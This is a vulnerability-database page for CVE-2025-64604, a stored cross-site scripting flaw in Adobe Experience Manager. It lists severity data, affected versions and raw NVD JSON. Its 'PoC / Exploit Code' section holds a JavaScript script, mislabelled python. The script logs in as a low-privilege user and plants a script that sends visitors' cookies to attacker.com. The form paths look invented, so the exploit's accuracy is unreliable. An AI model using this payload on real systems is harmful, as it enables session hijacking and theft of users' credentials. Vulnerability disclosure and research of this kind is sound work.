Security Vulnerability Report
中文
CVE-2025-64604 CVSS 5.4 MEDIUM

CVE-2025-64604

Published: 2025-12-10 19:16:24
Last Modified: 2025-12-12 17:40:38
Source: [email protected]

Description

Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:* - VULNERABLE
cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:* - VULNERABLE
Adobe Experience Manager 6.5.23及更早版本
Adobe Experience Manager 6.5.x < 6.5.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-64604 Stored XSS PoC for Adobe Experience Manager // Target: Adobe Experience Manager versions <= 6.5.23 // Author: Security Researcher const axios = require('axios'); const cheerio = require('cheerio'); class AEM_XSS_POC { constructor(baseUrl, username, password) { this.baseUrl = baseUrl; this.username = username; this.password = password; this.session = axios.create({ baseURL: baseUrl }); } async authenticate() { // Step 1: Authenticate with low-privilege account const loginData = { j_username: this.username, j_password: this.password, validate: 'true' }; const response = await this.session.post('/libs/granite/core/content/login.html/j_security_check', new URLSearchParams(loginData).toString(), { headers: { 'Content-Type': 'application/x-www-form-urlencoded' }} ); if (response.headers['set-cookie']) { this.cookies = response.headers['set-cookie']; } return response.status === 200; } async injectXSS(payload) { // Step 2: Inject malicious script into vulnerable form field const xssPayload = `<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>`; const formData = { './jcr:content/par/form/hiddenField': xssPayload, './jcr:content/par/form/textField': payload, './jcr:content/par/form@Delete': '' }; const response = await this.session.post( '/content/forms/af/dangrous-form/jcr:content/data', new URLSearchParams(formData).toString(), { headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': this.cookies } } ); return response.status === 200; } async verifyXSS() { // Step 3: Verify the XSS payload is stored and reflected const response = await this.session.get('/content/forms/af/dangrous-form.html'); const $ = cheerio.load(response.data); // Check if payload is present without sanitization const hasStoredXSS = $('input[value*="<script>"]').length > 0 || $('div').text().includes('<script>'); return hasStoredXSS; } } // Usage example (async () => { const poc = new AEM_XSS_POC( 'https://vulnerable-aem-instance.com', 'low-privilege-user', 'password123' ); console.log('[*] Starting CVE-2025-64604 PoC'); console.log('[*] Authenticating...'); if (await poc.authenticate()) { console.log('[+] Authentication successful'); console.log('[*] Injecting XSS payload...'); if (await poc.injectXSS('<img src=x onerror=alert(document.domain)>')) { console.log('[+] XSS payload injected successfully'); console.log('[*] Verifying stored XSS...'); if (await poc.verifyXSS()) { console.log('[!] VULNERABLE: Stored XSS confirmed'); } } } else { console.log('[-] Authentication failed'); } })();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64604", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:24.320", "lastModified": "2025-12-12T17:40:38.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.24.0", "matchCriteriaId": "0FC0CE20-2AC2-45FB-A7CF-9ADEEBC8B411"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:aem_cloud_service:*:*:*", "versionEndExcluding": "2025.12.0", "matchCriteriaId": "3326AB8A-7DF7-437C-86B6-58BA768E42E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:6.5:-:*:*:lts:*:*:*", "matchCriteriaId": "852C2582-859F-40DB-96CF-E1274CEECC1F"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.